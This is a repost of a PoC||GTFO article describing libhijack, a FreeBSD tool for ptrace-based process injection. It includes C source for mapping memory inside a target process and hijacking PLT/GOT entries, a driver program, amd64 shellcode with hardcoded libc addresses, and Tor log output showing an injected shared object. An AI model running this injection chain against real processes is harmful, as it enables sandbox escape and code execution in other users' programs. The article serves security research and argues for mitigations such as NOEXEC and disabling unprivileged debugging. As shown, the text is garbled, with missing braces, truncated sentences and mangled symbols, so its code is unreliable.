libhijack in PoC||GTFO 0x17!

It is with pride and pleasure that SoldierX's libhijack was featured in PoC||GTFO 0x17. Shawn Webb, the author of both libhijack and the article, spent months writing the article and going through a private peer review process.

The unedited version is posted below. The full issue can be found here (warning: large polyglot PDF). I hope you enjoy the article.

Hijacking Your Free Beasties

In the land of red devils known as Beasties exists a system devoid of
meaningful exploit mitigations. As we explore this vast land of
opportunity, we will meet our ELFish friends, [p]tracing their very
moves in order to hijack them. Since unprivileged process debugging is
enabled by default on FreeBSD, we can abuse PTrace to create anonymous
memory mappings, inject code into them, and overwrite PLT/GOT entries.
We will revive a tool called libhijack to make our nefarious
activities of hijacking ELFs via PTrace relatively easy.

Nothing presented here is technically new. However, this type of work
has not been documented in this much detail, tying it all into one
cohesive work. In Phrack 56, Silvio Cesare taught us ELF research
enthusiasts how to hook the PLT/GOT. The Phrack 59 article on Runtime
Process Infection briefly introduces the concept of injecting shared
objects by injecting shellcode via PTrace that calls dlopen(). No
other piece of research, however, has discovered the joys of forcing
the application to create anonymous memory mappings in which to inject

This is only part one of a series of planned articles that will follow
libhijack's development. The end goal is to be able to anonymously
inject shared objects. The libhijack project is maintained by the
SoldierX community.

Previous Research

All prior work injects code into the stack, the heap, or existing
executable code. All three methods create issues on today's systems.
On amd64 and arm64, the two architectures libhijack cares about, the
stack is non-executable by default. jemalloc, the heap implementation
on FreeBSD, creates non-executable mappings. Obviously overwriting
existing executable code destroys a part of the executable image.

PLT/GOT redirection attacks have proven extremely useful, so much so
that RELRO is a standard mitigation on hardened systems. Thankfully
for us as attackers, FreeBSD doesn't use read only relocations. And
even if FreeBSD did, using PTrace to do devious things negates RELRO
as PTrace gives us God-like capabilities. We will see the strength of
PaX NOEXEC in HardenedBSD, preventing PLT/GOT redirections and
executable code injections.

The Role of ELF

FreeBSD provides a nifty API for inspecting the entire virtual memory
space of an application. The results returned from the API tells us
the protection flags (readable, writable, executable) of each mapping.
If FreeBSD provides such a rich API, why would we need to parse the
ELF headers?

We want to ensure that we find the address of the system call
instruction ("syscall" on amd64, "svc 0" on arm64) in a valid memory
location. We want to ensure the proper alignment restrictions are met
(amd64: 1 byte, arm64: 8 bytes). Ensuring proper alignment is
important. If the execution is redirected to an improperly aligned
instruction, the CPU will abort the application (SIGBUS or SIGILL will
be raised on FreeBSD). Intel-based architectures, like amd64, do not
care about instruction alignment, hence the 1 byte alignment described

With a bit of additional work, we can also ensure that the mmap
syscall is called from the mmap libc function. Though such an
algorithm isn't currently implemented, doing so would be trivial.

PLT/GOT hijacking requires parsing ELF headers. One would not be able
to find the PLT/GOT without iterating through the Process Headers to
find the Dynamic Headers, eventually ending up with the DT_PLTGOT

We make heavy use of the Struct_Obj_Entry structure, which is the
second PLT/GOT entry. Indeed, in a future version of libhijack, we
will likely handcraft our own Struct_Obj_Entry object and insert that
into the real RTLD in order to allow the shared object to resolve
symbols via normal methods.

Thus, involving ELF early on through the process works to our
advantage. With FreeBSD's libprocstat API, we don't have a need for
parsing ELF headers until we get to the PLT/GOT stage, but doing so
early makes it easier for the attacker using libhijack. libhijack does
all the heavy lifting.

Finding the Base Address

Executables come in two flavors: Position-Independent Executables
(PIEs) or regular executables. Since FreeBSD does not have any form of
address space randomization (ASR or ASLR), FreeBSD does not ship any
application built as a PIE.

Because the base address of an application can change depending on
architecture, compiler/linker flags, and PIE status, libhijack needs
to find a way to determine the base address of the executable. The
base address contains the main ELF headers.

libhijack uses the libprocstat API to find the base address. The
following table shows default load addresses for PIEs and non-PIES on
amd64 and arm64:

| Arch  |        PIE         |      non-PIE       |
| amd64 | 0x0000000001021000 | 0x0000000000200000 |
| arm64 | 0x0000000000100000 | 0x0000000000010000 |

libhijack will loop through all the memory mappings as returned by the
libprocstat API. Only the first page of each mapping is read
in--enough to check for ELF headers. If the ELF headers are found,
then libhijack assumes that the first ELF object is that of the

static int
resolve_base_address(HIJACK *hijack)
	struct procstat *ps;
	struct kinfo_proc *p;
	struct kinfo_vmentry *vm;
	unsigned int i, cnt;
	int err;
	ElfW(Ehdr) *ehdr;

	vm = NULL;
	p = NULL;
	err = ERROR_NONE;
	cnt = 0;

	ps = procstat_open_sysctl();
	if (ps == NULL) {
		SetError(hijack, ERROR_SYSCALL);
		return (-1);

	p = procstat_getprocs(ps, KERN_PROC_PID, hijack->pid, &cnt);
	if (cnt == 0) {
		goto error;

	cnt = 0;
	vm = procstat_getvmmap(ps, p, &cnt);
	if (cnt == 0) {
		goto error;

	for (i = 0; i < cnt; i++) {
		if (vm[i].kve_type != KVME_TYPE_VNODE)

		ehdr = read_data(hijack,
		    (unsigned long)(vm[i].kve_start),
		if (ehdr == NULL) {
			goto error;
		if (IS_ELF(*ehdr)) {
			hijack->baseaddr = (unsigned long)(vm[i].kve_start);

	if (hijack->baseaddr == (unsigned long)NULL)

	if (vm != NULL)
		procstat_freevmmap(ps, vm);
	if (p != NULL)
		procstat_freeprocs(ps, p);
	return (err);

Assuming that the first ELF object is the application itself, though,
can cause libhijack to break in some corner cases. One such corner
case is when the RTLD is used to execute the application. For example,
instead of calling /bin/ls directly, the user may choose to call
/libexec/ /bin/ls. Doing so causes libhijack to not find
the PLT/GOT and fail early sanity checks. This can be worked around
by telling libhijack the base address to use instead of attempt

The RTLD in FreeBSD only recently gained the ability to execute
applications directly. Thus, the assumption that the first ELF object
is the application is generally a safe assumption to make.

Finding the syscall

As mentioned above, we want to ensure with 100% certainty we're
calling into the kernel from an executable memory mapping and in an
allowed location. The ELF headers tell us all the publicly accessible
functions loaded by a given ELF object.

The application itself may never call into the kernel directly.
Instead, it will rely on shared libraries to do that. The read()
system call is a perfect example. Reading data from a file descriptor
is a privileged operation that requires help from the kernel. The
read() libc function calls the read syscall.

libhijack iterates through the ELF headers, following this pseudocode

1. Locate the first Obj_Entry structure, a linked list that describes
   loaded shared object.
2. Iterate through the symbol table for the shared object:
   2.1. If the symbol is not a function, continue to the next symbol
        or break out if no more symbols.
   2.2. Read the symbol's payload into memory. Scan it for the syscall
        opcode modulo instruction alignment.
   2.3. If the instruction alignment is off, continue scanning the
   2.4. If the syscall opcode is found and the instruction alignment
        requirements are met, return the address of the system call.
3. Restart step #2 with the next Obj_Entry linked list node.

The above algorithm is implemented using a series of callbacks. This
is to encourage an internal API that is flexible and scalable to
different situations.

freebsd_parse_soe(HIJACK *hijack, struct Struct_Obj_Entry *soe, linkmap_callback callback)
    int err=0;
    ElfW(Sym) *libsym=NULL;
    unsigned long numsyms, symaddr=0, i=0;
    char *name;

    numsyms = soe->nchains;
    symaddr = (unsigned long)(soe->symtab);

        if ((libsym))

        libsym = (ElfW(Sym) *)read_data(hijack, (unsigned long)symaddr, sizeof(ElfW(Sym)));
        if (!(libsym)) {
            err = GetErrorCode(hijack);
            goto notfound;

        if (ELF64_ST_TYPE(libsym->st_info) != STT_FUNC) {
            symaddr += sizeof(ElfW(Sym));

        name = read_str(hijack, (unsigned long)(soe->strtab + libsym->st_name));
        if ((name)) {
            if (callback(hijack, soe, name, ((unsigned long)(soe->mapbase) + libsym->st_value), (size_t)(libsym->st_size)) != CONTPROC) {


        symaddr += sizeof(ElfW(Sym));
    } while (i++ < numsyms);

    SetError(hijack, err);

syscall_callback(HIJACK *hijack, void *linkmap, char *name, unsigned long vaddr, size_t sz)
	unsigned long syscalladdr;
	unsigned int align;
	size_t left;
	align = GetInstructionAlignment();
	left = sz;
	while (left > sizeof(SYSCALLSEARCH) - 1) {
		syscalladdr = search_mem(hijack, vaddr, left, SYSCALLSEARCH, sizeof(SYSCALLSEARCH)-1);
		if (syscalladdr == (unsigned long)NULL)

		if ((syscalladdr % align) == 0) {
			hijack->syscalladdr = syscalladdr;
			return TERMPROC;

		left -= (syscalladdr - vaddr);
		vaddr += (syscalladdr - vaddr) + sizeof(SYSCALLSEARCH)-1;
	return CONTPROC;

LocateSystemCall(HIJACK *hijack)
	Obj_Entry *soe, *next;
	if (IsAttached(hijack) == false)
		return (SetError(hijack, ERROR_NOTATTACHED));

	if (IsFlagSet(hijack, F_DEBUG))
		fprintf(stderr, "[*] Looking for syscall\n");
	soe = hijack->soe;
	do {
		freebsd_parse_soe(hijack, soe, syscall_callback);
		next = TAILQ_NEXT(soe, next);
		if (soe != hijack->soe)
		if (hijack->syscalladdr != (unsigned long)NULL)
		soe = read_data(hijack,
		    (unsigned long)next,
	} while (soe != NULL);

	if (hijack->syscalladdr == (unsigned long)NULL) {
		if (IsFlagSet(hijack, F_DEBUG))
			fprintf(stderr, "[-] Could not find the syscall\n");
		return (SetError(hijack, ERROR_NEEDED));

	if (IsFlagSet(hijack, F_DEBUG))
		fprintf(stderr, "[+] syscall found at 0x%016lx\n",

	return (SetError(hijack, ERROR_NONE));

Creating a new memory mapping

Now that we found the syscall, we can now force the application to
call mmap. Both amd64 and arm64 have slightly different approaches to
calling mmap. On amd64, we simply set the registers, including setting
the instruction pointer, to their respective values. On arm64, we must
wait until the application attempts to call a system call, then set
the registers to their respective values.

Finally, in both cases, we continue execution, waiting for mmap to
finish. Once mmap finishes, we should have our new mapping. mmap will
store the start address of the new memory mapping in rax on amd64 and
x0 on arm64. We save this address, restore the registers back to their
previous values, and return the address back to the user.

Below is handy dandy table for the registers we set:

|  arch   | register |      value     |
|  amd64  |    rax   | syscall number |
|  amd64  |    rdi   |      addr      |
|  amd64  |    rsi   |     length     |
|  amd64  |    rdx   |      prot      |
|  amd64  |    r10   |      flags     |
|  amd64  |    r8    |     fd (-1)    |
|  amd64  |    r9    |   offset (0)   |
| aarch64 |    x0    | syscall number |
| aarch64 |    x1    |      addr      |
| aarch64 |    x2    |     length     |
| aarch64 |    x3    |      prot      |
| aarch64 |    x4    |      flags     |
| aarch64 |    x5    |     fd (-1)    |
| aarch64 |    x6    |   offset (0)   |
| aarch64 |    x8    |   terminator   |

Currently, fd and offset are hardcoded to -1 and 0 respectively. The
point of libhijack is to use anonymous memory mappings. When mmap
returns, it will place the start address of the new memory mapping in
rax on amd64 and x0 on arm64.

The implementation of md_map_memory for amd64 looks like this:

unsigned long
md_map_memory(HIJACK *hijack, struct mmap_arg_struct *mmap_args)
	REGS regs_backup, *regs;
	unsigned long addr, ret;
	register_t stackp;
	int err, status;

	ret = (unsigned long)NULL;
	err = ERROR_NONE;
	regs = _hijack_malloc(hijack, sizeof(REGS));
	if (ptrace(PT_GETREGS, hijack->pid, (caddr_t)regs, 0) < 0) {
		goto end;
	memcpy(®s_backup, regs, sizeof(REGS));

	SetRegister(regs, "syscall", MMAPSYSCALL);
	SetInstructionPointer(regs, hijack->syscalladdr);
	SetRegister(regs, "arg0", mmap_args->addr);
	SetRegister(regs, "arg1", mmap_args->len);
	SetRegister(regs, "arg2", mmap_args->prot);
	SetRegister(regs, "arg3", mmap_args->flags);
	SetRegister(regs, "arg4", -1); /* fd */
	SetRegister(regs, "arg5", 0); /* offset */

	if (ptrace(PT_SETREGS, hijack->pid, (caddr_t)regs, 0) < 0) {
		goto end;
	/* time to run mmap */
	while (addr == MMAPSYSCALL) {
		if (ptrace(PT_STEP, hijack->pid, (caddr_t)0, 0) < 0)
		do {
			waitpid(hijack->pid, &status, 0);
		} while (!WIFSTOPPED(status));
		ptrace(PT_GETREGS, hijack->pid, (caddr_t)regs, 0);
		addr = GetRegister(regs, "ret");
	if ((long)addr == -1) {
		if (IsFlagSet(hijack, F_DEBUG))
			fprintf(stderr, "[-] Could not map address. Calling mmap failed!\n");
		ptrace(PT_SETREGS, hijack->pid, (caddr_t)(®s_backup), 0);
		goto end;

	if (ptrace(PT_SETREGS, hijack->pid, (caddr_t)(®s_backup), 0) < 0)
	if (err == ERROR_NONE)
		ret = addr;
	SetError(hijack, err);
	return (ret);

Even though we're going to write to the memory mapping, the protection
level doesn't need to have the write flag set. Remember, with PTrace,
we're gods. FreeBSD will allow us to write to the memory mapping via
PTrace, even if that memory mapping is non-writable.

HardenedBSD, a derivative of FreeBSD, prevents the creation of memory
mappings that are both writable and executable. If a user attempts to
create a memory mapping that is both writable and executable, the
execute bit will be dropped. Similarily, HardenedBSD prevents
upgrading a writable memory mapping to executable with mprotect.
HardenedBSD places these same restrictions on PTrace. As a result,
libhijack is completely mitigated in HardenedBSD.

Hijacking the PLT/GOT

Now that we have an anonymous memory mapping we can inject code into,
it's time to look at hijacking the Procedure Linkage Table/Global
Offset Table. PLT/GOT hijacking only works for symbols that have been
resolved by the RTLD in advance. Thus, if the function you want to
hijack has not been called, its address will not be in the PLT/GOT
unless BIND_NOW is active.

The application itself contains its own PLT/GOT. Each shared object it
depends on has its own PLT/GOT as well. For example, libpcap requires
libc. libpcap calls functions in libc and thus needs its own linkage
table to resolve libc functions at runtime.

This is the reason why parsing the ELF headers, looking for functions,
for the system call as detailed above works to our advantage. Along
the way, we get to know certain pieces of info, like where the PLT/GOT
is. libhijack will cache that information along the way.

In order to hijack PLT/GOT entries, we need to know two pieces of
information: the address of the PLT/GOT entry we want to hijack and
the address to point it to. Luckily, libhijack has an API for
resolving functions and their locations in the PLT/GOT.

Once we have those two pieces of information, then hijacking the GOT
entry is simple and straight-forward. We just replace the entry in the
GOT with the new address. Ideally, the the injected code would first
stash the original address for later use.

Case Study: Tor Capsicumization

Capsicum is a capabilities framework for FreeBSD. It's commonly used
to implement application sandboxing. HardenedBSD is actively working
on integrating Capsicum for Tor. Tor currently supports a sandboxing
methodology that is wholly incompatible with Capsicum. Tor's
sandboxing model uses seccomp2, a filtering-based sandbox. When Tor
starts up, Tor tells its sandbox initialization routines to whitelist
certain resources followed by activation of the sandbox. Tor then can
call open(2), stat(2), etc. as needed on an on-demand basis.

In order to prevent a full rewrite of Tor to handle Capsicum,
HardenedBSD has opted to use wrappers around so-called "privileged
operation" function calls (ie, open(2), stat(2), etc.) Thus, open(2)
becomes sandbox_open().

Prior to entering capabilities mode (capmode for short), Tor will
pre-open any directories within which it expects to open files. Any
time Tor expects to open a file, it will call openat rather than open.
Thus, Tor is limited to using files within the directories it uses.
For this reason, we will place the shared object within Tor's data
directory. This is not unreasonable, since we either must be root or
running as the same user as the tor daemon in order to use libhijack
against it.

Note that as of the time of this writing, the Capsicum patch to Tor
has not landed upstream and is in a separate repository. The
work-in-progress code can be found here:

Since FreeBSD does not implement any meaningful exploit mitigation
outside of arguably ineffective stack cookies, an attacker can abuse
memory corruption vulnerabilities to use ret2libc style attacks
against wrapper-style capsicumized applications with 100% reliability.
Instead of ret2open, all the attacker needs to do is ret2sandbox_open.
Without exploit mitigations like PaX ASLR, PaX NOEXEC, and/or CFI, the
following code can be used copy/paste style, allowing for mass
exploitation without payload modification.

To illustrate the need for ASLR and NOEXEC, we will use libhijack to
emulate a vulnerability exploitation resulting in a control flow
hijack. Note that due using libhijack, we bypass the forward-edge
guarantees CFI gives us. llvm's implementation of CFI does not include
backward-edge guarantees. We could gain backward-edge guarantees
through SafeStack; however, Tor immediately crashes when compiled with
both CFI and SafeStack.

In the following code snippet, we perform the following:

1. We attach to the victim process.
2. We create an anonmymous memory allocation with read and execute
3. We write the filename that we'll pass to sandbox_open() into the
   beginning of the allocation.
4. We inject the shellcode into the allocation, just after the
5. We execute the shellcode and detach from the process
6. The following pertains now to the shellcode:
7. We call sandbox_open. The address is hardcoded and can be reused
   among like systems.
8. We save the return value of sandbox_open, which will be the opened
   file descriptor.
9. We pass the file descriptor to fdopen. The address of fdopen is
   hardcoded and can be reused on like systems.
10. The RTLD loads the shared object.
    10.1. Part of loading is calling any initialization routines. In
          this case, a simple string is printed to the console.

/* main.c */
#define	MMAP_HINT	 0x4000UL

usage(char *name)
	fprintf(stderr, "USAGE: %s   \n", name);

main(int argc, char *argv[])
	unsigned long addr, ptr;
	HIJACK *ctx;

	if (argc != 4)

	ctx = InitHijack(F_DEFAULT);
	AssignPid(ctx, (pid_t)atoi(argv[1]));

	if (Attach(ctx)) {
		fprintf(stderr, "[-] Could not attach!\n");


	addr = MapMemory(ctx, MMAP_HINT, getpagesize(),
	if (addr == (unsigned long)-1) {
		fprintf(stderr, "[-] Could not map memory!\n");

	ptr = addr;

	WriteData(ctx, addr, argv[3], strlen(argv[3])+1);
	ptr += strlen(argv[3]) + 1;
	InjectShellcodeAndRun(ctx, ptr, argv[2], true);


	return (0);
/* end of main.c */

/* sandbox_fdlopen.asm */

mov rbp, rsp

; Save registers
push rdi
push rsi
push rdx
push rcx
push rax

; Call sandbox_open
mov rdi, 0x4000
xor rsi, rsi
xor rdx, rdx
xor rcx, rcx
mov rax, 0x00000000011c4070 ; Address of sandbox_open
call rax

; Call fdlopen
mov rdi, rax
mov rsi, 0x101
mov rax, 0x8014c3670 ; Address of fdlopen
call rax

; Restore registers
pop rax
pop rcx
pop rdx
pop rsi
pop rdi

mov rsp, rbp
/* end of sandbox_fdlopen.asm */

/* testso.c */
__attribute__((constructor)) void
        printf("This output is from an injected shared object. You have been pwned.\n");
/* end of testso.c */

Output of Tor:

Oct 04 18:59:25.976 [notice] Tor running on FreeBSD with Libevent 2.1.8-stable, OpenSSL 1.0.2k-freebsd, Zlib 1.2.11, Liblzma N/A, and Libzstd N/A.                   
Oct 04 18:59:25.976 [notice] Tor can't help you if you use it wrong! Learn how to be safe at                                  
Oct 04 18:59:25.976 [notice] This version is not a stable Tor release. Expect more bugs than usual.                                                                                
Oct 04 18:59:25.977 [notice] Read configuration file "/home/shawn/installs/etc/tor/torrc".                                                                                         
Oct 04 18:59:25.982 [notice] Scheduler type KISTLite has been enabled.                   
Oct 04 18:59:25.982 [notice] Opening Socks listener on                    
Oct 04 18:59:25.000 [notice] Parsing GEOIP IPv4 file /home/shawn/installs/share/tor/geoip.                                                                                         
Oct 04 18:59:26.000 [notice] Parsing GEOIP IPv6 file /home/shawn/installs/share/tor/geoip6.                                                                                        
Oct 04 18:59:26.000 [notice] Bootstrapped 0%: Starting                                   
Oct 04 18:59:27.000 [notice] Starting with guard context "default"                       
Oct 04 18:59:27.000 [notice] Bootstrapped 80%: Connecting to the Tor network             
Oct 04 18:59:28.000 [notice] Bootstrapped 85%: Finishing handshake with first hop        
Oct 04 18:59:29.000 [notice] Bootstrapped 90%: Establishing a Tor circuit                
Oct 04 18:59:31.000 [notice] Tor has successfully opened a circuit. Looks like client functionality is working.                                                                    
Oct 04 18:59:31.000 [notice] Bootstrapped 100%: Done                                     
This output is from an injected shared object. You have been pwned.

The Future of libhijack

Writing devious code in assembly is cumbersome. Assembly doesn't scale
well to multiple architectures. Instead, we would like to write our
devious code in C, compiling to a shared object that gets injected
anonymously. This requires writing a remote RTLD within libhijack and
is in progress. Writing a remote RTLD will take a while as doing so is
not an easy task.

Additionally, creation of a general-purpose helper library that gets
injected would be helpful. It could aid in PLT/GOT redirection
attacks, possibly storing the addresses of functions we've previously
hijacked. This work is dependent on the remote RTLD.

libhijack currently lacks documentation. Once the ABI and API
stabilize, formal documentation will be written.


Using libhijack, we can easily create anonymous memory mappings,
inject into them arbitrary code, and hijack the PLT/GOT on FreeBSD. On
HardenedBSD, a hardened derivative of FreeBSD, libhijack is fully
mitigated through PaX NOEXEC.

We've demonstrated that wrapper-style Capsicum is ineffective on
FreeBSD. Through the use of libhijack, we emulate a control flow
hijack in which the application is forced to call sandbox_open and
fdlopen on the resulting file descriptor.

Further work to support anonymous injection of full shared objects,
along with their dependencies, will be supported in the future.
Imagine injecting libpcap into Apache to sniff traffic whenever "GET
/pcap" is sent.

In order to prevent abuse of PTrace, FreeBSD should set the
security.bsd.unprivileged_proc_debug to 0 by default. In order to
prevent process manipulation, FreeBSD should implement PaX NOEXEC.

libhijack can be found at